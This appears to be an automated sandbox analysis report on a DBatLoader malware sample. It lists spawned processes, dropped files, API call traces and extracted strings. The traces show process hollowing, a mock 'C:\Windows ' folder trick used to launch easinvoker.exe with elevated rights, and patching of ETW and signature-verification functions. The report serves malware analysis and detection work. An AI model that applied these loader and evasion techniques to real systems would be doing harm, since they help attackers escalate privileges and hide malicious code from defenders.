Commandline:	C:\Users\user\Desktop\qDKTsL1y44.exe
Imagebase:	0x400000
File size:	2'088'448 bytes
MD5 hash:	42F93EF4AC4943F328A1518BDE3C333A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000000.00000003.1362814847.000000007FBF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:21:15
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\FinqiaevO.bat" "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:21:15
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:21:15
Start date:	08/02/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c mkdir "\\?\C:\Windows "
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:21:15
Start date:	08/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:21:15
Start date:	08/02/2024
Path:	C:\Users\Public\Libraries\veaiqniF.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\veaiqniF.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:21:23
Start date:	08/02/2024
Path:	C:\Users\Public\Libraries\Finqiaev.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Finqiaev.PIF"
Imagebase:	0x400000
File size:	2'088'448 bytes
MD5 hash:	42F93EF4AC4943F328A1518BDE3C333A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000009.00000002.1632705294.0000000004141000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 71%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:21:29
Start date:	08/02/2024
Path:	C:\Users\Public\Libraries\veaiqniF.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\veaiqniF.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:21:31
Start date:	08/02/2024
Path:	C:\Users\Public\Libraries\Finqiaev.PIF
Wow64 process (32bit):	true
Commandline:	"C:\Users\Public\Libraries\Finqiaev.PIF"
Imagebase:	0x400000
File size:	2'088'448 bytes
MD5 hash:	42F93EF4AC4943F328A1518BDE3C333A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000B.00000002.1746636334.00000000040B1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:21:41
Start date:	08/02/2024
Path:	C:\Users\Public\Libraries\veaiqniF.pif
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Libraries\veaiqniF.pif
Imagebase:	0x400000
File size:	175'800 bytes
MD5 hash:	22331ABCC9472CC9DC6F37FAF333AA2C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	7.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	8.4%
Total number of Nodes:	634
Total number of Limit Nodes:	34

Executed Functions

Function 0423CA40 Relevance: 219.9, APIs: 12, Strings: 109, Instructions: 8183COMMON

Download Yara Rule

APIs

InetIsOffline.URL(00000000,00000000,04247AA9,?,?,?,000002BA,00000000,00000000), ref: 0423CA75

Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

Part of subcall function 041E8DE0: GetFileAttributesA.KERNEL32(00000000,?,0423D4C6,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanString,0427A350,04247AE0,UacScan,0427A350,04247AE0,UacInitialize), ref: 041E8DEB

Part of subcall function 041ED570: GetModuleFileNameA.KERNEL32(00000000,?,00000105,0436EB38,?,0423D7E7,ScanBuffer,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,OpenSession), ref: 041ED587

Part of subcall function 0423B768: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7A3
Part of subcall function 0423B768: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0423B838), ref: 0423B7D3
Part of subcall function 0423B768: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0423B7E8
Part of subcall function 0423B768: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0423B814
Part of subcall function 0423B768: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0423B81D

Part of subcall function 041E8E04: GetFileAttributesA.KERNEL32(00000000,?,0424062B,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0,ScanBuffer,0427A350,04247AE0,ScanString), ref: 041E8E0F

Part of subcall function 041E8FCC: CreateDirectoryA.KERNEL32(00000000,00000000,?,042406D1,ScanBuffer,0427A350,04247AE0,ScanString,0427A350,04247AE0,OpenSession,0427A350,04247AE0,OpenSession,0427A350,04247AE0), ref: 041E8FD9

Part of subcall function 0423B684: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0423B756), ref: 0423B6C3
Part of subcall function 0423B684: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0423B6FD
Part of subcall function 0423B684: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0423B72A
Part of subcall function 0423B684: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0423B733

Strings

cmd /c "C:\\Windows \\System32\\easinvoker.exe", xrefs: 04244309
CryptSIPVerifyIndirectData, xrefs: 0423CE90
psapi, xrefs: 04246A01
DEEX, xrefs: 0423CA83
NtWaitForSingleObject, xrefs: 042467F9
EtwEventWriteEx, xrefs: 0424722A
EtwEventWrite, xrefs: 0424725D
NtQuerySystemInformation, xrefs: 04246984
spp, xrefs: 04246EDE
I_QueryTagInformation, xrefs: 0424598F
RtlCreateQueryDebugBuffer, xrefs: 0424685F
Initialize, xrefs: 0423CB0E, 0423D8B2, 0423DA35, 0423DBEA, 0423DD90, 0423E045, 0423EB46, 0423EFFE, 0423F2B8, 0423F3C2, 0423FAA9, 0423FCE3, 0423FF0B, 0424023F, 042406DD, 04240D4F, 04240F14, 04244DCB, 042455F0, 042459E2, 042464DD, 04246D59, 04247477
LdrGetProcedureAddress, xrefs: 04247191
kernel32, xrefs: 04246C05, 04246C38, 04246C6B, 04246C9E, 04246CD1, 04246D04, 04246D37
Advapi, xrefs: 042469C5, 042469D4, 042469E3, 042469F2, 04246A2E, 04246A3D, 04246A4C
UacUninitialize, xrefs: 042421BA
OpenSession, xrefs: 0423CAAA, 0423D3B9, 0423D4DA, 0423D5E7, 0423D6EE, 0423DAB1, 0423DC66, 0423DE0C, 0423DFA8, 0423E0C1, 0423E235, 0423E8FC, 0423E9AA, 0423EC5C, 0423EE8A, 0423EF82, 0423F19D, 0423F54D, 0423F5D0, 0423F6E8, 0423F800, 0423F90C, 0423FB4F, 0423FDEE, 0423FF87, 04240127, 042403ED, 0424051D, 04240828, 04240953, 04240AAB, 04240BDB, 04240C57, 0424100C, 04241242, 042413B6, 0424154A, 042416FA, 04241B65, 04241D7B, 04241E23, 04241FC8, 042422D5, 04244100, 0424439B, 042444A8, 04244645, 0424487B, 04244920, 04244BAB, 04244D4F, 0424504C, 04245253, 04245364, 04245465, 0424576F, 042458A3, 04245ADA, 04245DCB, 04245E59, 042461AC, 042463B2, 04246461, 042466A1, 04246898, 04246AFC, 04246DD5, 042473FB, 0424756F
DllGetClassObject, xrefs: 0423D103, 04240753, 04246EFA
VirtualAllocEx, xrefs: 04246C21
DlpGetWebSiteAccess, xrefs: 04246668
CreateProcessA, xrefs: 04246A0B
BCryptQueryProviderRegistration, xrefs: 0423CFA5, 0424586F
NtQueryDirectoryFile, xrefs: 042469A2
CreateProcessAsUserA, xrefs: 04246A29
C:\Users\Public\Libraries, xrefs: 0423DA1F
C:\\Users\\Public\\Libraries\\, xrefs: 04240E3B
CreateProcessWithLogonW, xrefs: 04246A47
WriteVirtualMemory, xrefs: 04246CBA
DlpGetArchiveFileTraceInfo, xrefs: 04246635
EnumServicesStatusExA, xrefs: 042469DE
NtQueryInformationThread, xrefs: 04246FF9
NtCreateSection, xrefs: 0424705F
FindCertsByIssuer, xrefs: 0423CD47
http, xrefs: 0423F4AE
RtlAllocateHeap, xrefs: 042467C6, 0424682C
NtDeviceIoControlFile, xrefs: 04246993
[InternetShortcut], xrefs: 042414C1
bcrypt, xrefs: 0423CF89, 0423CFBC, 0423CFEF, 04245860, 04245874, 04245888, 0424643F
NtQuerySecurityObject, xrefs: 042470F8
HotKey=, xrefs: 04241658
NtMapViewOfSection, xrefs: 04247092
NtWriteVirtualMemory, xrefs: 042471C4
NtOpenFile, xrefs: 042471F7
advapi32, xrefs: 04245994
endpointdlp, xrefs: 042465E6, 04246619, 0424664C, 0424667F
connect, xrefs: 04246A56
TrustOpenStores, xrefs: 0423CCF9
GET, xrefs: 0423F7DB
VirtualProtect, xrefs: 04246C54
CreateProcessW, xrefs: 04246A1A
NtAlertResumeThread, xrefs: 04246793
SxTracerGetThreadContextDebug, xrefs: 04246EC7
EnumServicesStatusA, xrefs: 042469C0
.png, xrefs: 0423DBA3, 0423E2AB, 0424729B, 042472E1, 0424732B, 04247352
NtAccessCheck, xrefs: 0424712B
CreateProcessAsUserW, xrefs: 04246A38, 04246A65
NtOpenSection, xrefs: 0424702C
LdrLoadDll, xrefs: 0424715E
URL=file:", xrefs: 042414D0
BCryptVerifySignature, xrefs: 0423CF72, 0424585B, 04246428
CryptSIPGetInfo, xrefs: 0423CE5D
DllGetActivationFactory, xrefs: 0423D136
ntdll, xrefs: 042459A8, 042459BC, 042467AA, 042467DD, 04246810, 04246843, 04246876, 04246FAA, 04246FDD, 04247010, 04247043, 04247076, 042470A9, 042470DC, 0424710F, 04247142, 04247175, 042471A8, 042471DB, 0424720E, 04247241, 04247274, 042475E9
Ntdll, xrefs: 04246989, 04246998, 042469A7, 042469B6
Kernel32, xrefs: 04246A10, 04246A1F, 04246A6A
SetUnhandledExceptionFilter, xrefs: 04246D20
C:\Users\Public\, xrefs: 042409D8, 0424176A
SLGetEncryptedPIDEx, xrefs: 04246F60
ws2_32, xrefs: 04246A5B
DllRegisterServer, xrefs: 0423D169
OpenProcess, xrefs: 04246C87
UacScan, xrefs: 0423CC3A, 0423D1A2, 0423D29A, 0423D836, 0423E804, 0423ED66, 0423F64C, 0423FC67, 04240E98, 042411C6, 04241C5D, 04242044, 04242236, 04242351, 0424417C, 04244524, 042445C9, 04244764, 04244AB3, 04244E47, 04244F54, 04245129, 04245574, 042456F3, 04245A5E, 04245B80, 04245ED5, 04245FF2, 042462A4
wintrust, xrefs: 0423CD0A, 0423CD31, 0423CD58
ScanString, xrefs: 0423CC9E, 0423CD77, 0423CEFC, 0423D08D, 0423D316, 0423D435, 0423D9AA, 0423EA26, 0423EBC2, 0423F07A, 0423F121, 0423F219, 0423F43E, 0423F764, 0423F988, 0423FA2D, 0423FD72, 042400AB, 042402BB, 04240599, 04240B27, 04240CD3, 04240F90, 04241451, 042415C6, 0424167E, 04241CFF, 04241F4C, 042441F8, 0424431F, 0424442C, 04244EC3, 042452CF, 042453E0, 042457EB, 04245D4F, 04246228, 04246336, 0424671D, 04246914, 04246B78, 04246E51, 0424737F
VirtualAlloc, xrefs: 04246BEE
EnumServicesStatusW, xrefs: 042469CF
FlushInstructionCache, xrefs: 04246CED
NtQueryVirtualMemory, xrefs: 04246FC6
C:\\Windows \\System32\\easinvoker.exe, xrefs: 0424426E
UacInitialize, xrefs: 0423CBD6, 0423D21E, 0423D92E, 04240A2F, 04244084, 04244FD0, 04245BFC, 04246A80
MZP, xrefs: 04245FC7
IconIndex=, xrefs: 04241524
sppc, xrefs: 04246F44, 04246F77
SLGatherMigrationBlob, xrefs: 04246F2D
iexpress.exe, xrefs: 0423D6D8
NtGetWriteWatch, xrefs: 04246F93
sppwmi, xrefs: 04246F11
NtSetSecurityObject, xrefs: 042459A3
@^@, xrefs: 0423F0F0
acS, xrefs: 04242425
^^Nc, xrefs: 0423DEFE, 0423EA9C
smartscreenps, xrefs: 0423D11A, 0423D14D, 0423D180
RtlQueryProcessDebugInformation, xrefs: 042469B1
BCryptRegisterProvider, xrefs: 0423CFD8, 04245883
ScanBuffer, xrefs: 0423CB72, 0423CDE7, 0423D011, 0423D556, 0423D663, 0423D76A, 0423DB2D, 0423DCE2, 0423DE88, 0423DF2C, 0423E13D, 0423E1B9, 0423E880, 0423EACA, 0423ECD8, 0423EDE2, 0423EF06, 0423F334, 0423F4D1, 0423F87C, 0423FBCB, 0423FE8F, 04240003, 042401C3, 04240371, 0424063F, 042407AC, 042408D7, 04240DCB, 04241088, 0424114A, 042412BE, 0424133A, 04241BE1, 04241E9F, 0424213E, 04244008, 04244297, 042446E8, 042447FF, 0424499C, 04244A37, 04244B2F, 042451A5, 042454E1, 0424566C, 0424591F, 04245C78, 04245F51, 0424606E, 04246130, 04246559, 042474F3
NtOpenProcess, xrefs: 042459B7, 042475E4
WintrustAddActionID, xrefs: 0423CD20
.url, xrefs: 042409E3
mssip32, xrefs: 0423CE74, 0423CEA7, 0423CEDA
EnumServicesStatusExW, xrefs: 042469ED
WinHttp.WinHttpRequest.5.1, xrefs: 0423F6C2
C:\Windows\SysWOW64, xrefs: 042422AC
C:\Windows\System32\, xrefs: 0423D4B1, 042445A2, 042450DE
NtReadVirtualMemory, xrefs: 042470C5
DlpNotifyPreDragDrop, xrefs: 042465CF
can, xrefs: 04242438
CryptSIPGetSignedDataMsg, xrefs: 0423CEC3
EnumProcessModules, xrefs: 042469FC
DlpCheckIsCloudSyncApp, xrefs: 04246602

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: File$Path$Name$AttributesCloseCreateCurrentLibraryMemoryModuleName_ProcessVirtualWrite$AddressDirectoryFreeHandleInetInformationLoadOfflineOpenProcProtectQueryRead
String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
API String ID: 2178617691-2902499223
Opcode ID: 160ee265cddddf79f3af9393b17ee0af76f3e6eb4d9f9c7ca8f5d204c5647d55
Instruction ID: 7546a1c4f1b418431e3ad8a47e3a10ea40cc3df4cb01620c569b068f93f8ce63
Opcode Fuzzy Hash: 160ee265cddddf79f3af9393b17ee0af76f3e6eb4d9f9c7ca8f5d204c5647d55
Instruction Fuzzy Hash: 35F3FB39B11519CBEB14EB65DDC0AEEB3B9EFC8308F1045A2E149A7650DB31BE468F44

Uniqueness

Uniqueness Score: -1.00%

Function 04207E4C Relevance: 43.5, APIs: 8, Strings: 16, Instructions: 1478
nativethreadprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 041FFD38: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD70
Part of subcall function 041FFD38: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFD7E
Part of subcall function 041FFD38: GetProcAddress.KERNEL32(74B80000,00000000), ref: 041FFD97
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB3
Part of subcall function 041FFD38: NtProtectVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000,041FFE14), ref: 041FFDB9
Part of subcall function 041FFD38: GetCurrentProcess.KERNEL32(0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE3
Part of subcall function 041FFD38: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000,00000000), ref: 041FFDE9
Part of subcall function 041FFD38: FreeLibrary.KERNEL32(74B80000,00000000,0427A35C,Function_00006ADC,00000004,0427A360,00000000,0427A35C,17D783FC,00000040,00000004,74B80000,00000000,00000000,00000000,00000000), ref: 041FFDF4

CreateProcessAsUserW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0427A408,0427A3F8,OpenSession,0427A3D0,04209710,ScanString,0427A3D0), ref: 042082D9
GetThreadContext.KERNEL32(000005E4,0427A44C,ScanString,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,ScanBuffer,0427A3D0,04209710,ScanBuffer,0427A3D0,04209710,OpenSession,0427A3D0), ref: 042085CE
NtReadVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,002EEFF8,0427A520,00000004,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0), ref: 0420882B
NtUnmapViewOfSection.N(00000884,00400000,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A520,00000004,0427A528), ref: 042089A6

Part of subcall function 041FFB80: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 041FFB8D
Part of subcall function 041FFB80: GetProcAddress.KERNEL32(00000000,C:\Windows\System32\ntdll.dll), ref: 041FFB93
Part of subcall function 041FFB80: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 041FFBB3

NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00400000,00000000,178A4400,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,ScanBuffer,0427A3D0), ref: 04208F89
NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,002EEFF8,0427A524,00000004,0427A528,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,00400000), ref: 042090FC
SetThreadContext.KERNEL32(000005E4,0427A44C,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A524,00000004,0427A528), ref: 04209272
NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(000005E4,00000000,000005E4,0427A44C,ScanBuffer,0427A3D0,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,00000884,002EEFF8,0427A524), ref: 0420927F

Part of subcall function 041FFCD8: LoadLibraryW.KERNEL32(bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0,04209710,000005E4,0427A44C), ref: 041FFCEA
Part of subcall function 041FFCD8: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 041FFCF7
Part of subcall function 041FFCD8: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000884,00000000,?,00000001,?,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan), ref: 041FFD0E
Part of subcall function 041FFCD8: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,04209710,ScanString,0427A3D0,04209710,Initialize,0427A3D0,04209710,UacScan,0427A3D0,04209710,UacInitialize,0427A3D0), ref: 041FFD1D

Strings

NtSetSecurityObject, xrefs: 042095B7
UacScan, xrefs: 04207EF6, 0420810E, 04208653, 04208A4F, 04208BC3, 042092FC
NtOpenObjectAuditAlarm, xrefs: 0420958F
BCryptQueryProviderRegistration, xrefs: 042094E2
BCryptVerifySignature, xrefs: 042094CE
Initialize, xrefs: 04208167, 042086C4, 0420884B, 04208C34, 04208E25, 04208F95, 04209108, 0420936D
OpenSession, xrefs: 04208237, 0420835A, 042095D2
advapi32, xrefs: 042095A8
I_QueryTagInformation, xrefs: 042095A3
NtReadVirtualMemory, xrefs: 0420957B
UacInitialize, xrefs: 042080B5, 042082E9, 042084DE, 042085E2, 042089DE, 04208B52, 0420928B
ScanBuffer, xrefs: 04207E85, 04207F4F, 04207FD7, 042083CB, 0420846D, 042087A6, 0420892D, 04208AC0, 04208D49, 04208F07, 04209077, 042091EA, 042093DE, 04209643
ScanString, xrefs: 04208030, 042081C6, 0420854F, 04208735, 042088BC, 04208CD8, 04208E96, 04209006, 04209179, 04209464, 04209511
bcrypt, xrefs: 042094D3, 042094E7, 042094FB
BCryptRegisterProvider, xrefs: 042094F6
ntdll, xrefs: 04209580, 04209594, 042095BC

Memory Dump Source

Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true

Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd

Yara matches

Similarity

API ID: MemoryVirtual$LibraryWrite$AddressProcProcessThread$ContextCurrentFreeHandleLoadModule$AllocateCreateProtectReadResumeSectionUnmapUserView
String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$NtOpenObjectAuditAlarm$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$ntdll
API String ID: 1232097254-1058128293
Opcode ID: bb70f5dedb7ea6d2f9ffc740ba7bee53ee293942f2b85cbbdfbc1b64c5528632
Instruction ID: 0785f2e3d3345bd43283a22c4e11a55247b44ebae8b2313388ecd025ea139feb
Opcode Fuzzy Hash: bb70f5dedb7ea6d2f9ffc740ba7bee53ee293942f2b85cbbdfbc1b64c5528632
Instruction Fuzzy Hash: 89D21E7AB105189BEB11EB69DCC0BDEB3B9AF48304F1085E1D109A7265DB31BE86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 041E5DDC Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105,041E0000,0424A794), ref: 041E5DF8
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E16
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,041E0000,0424A794), ref: 041E5E34
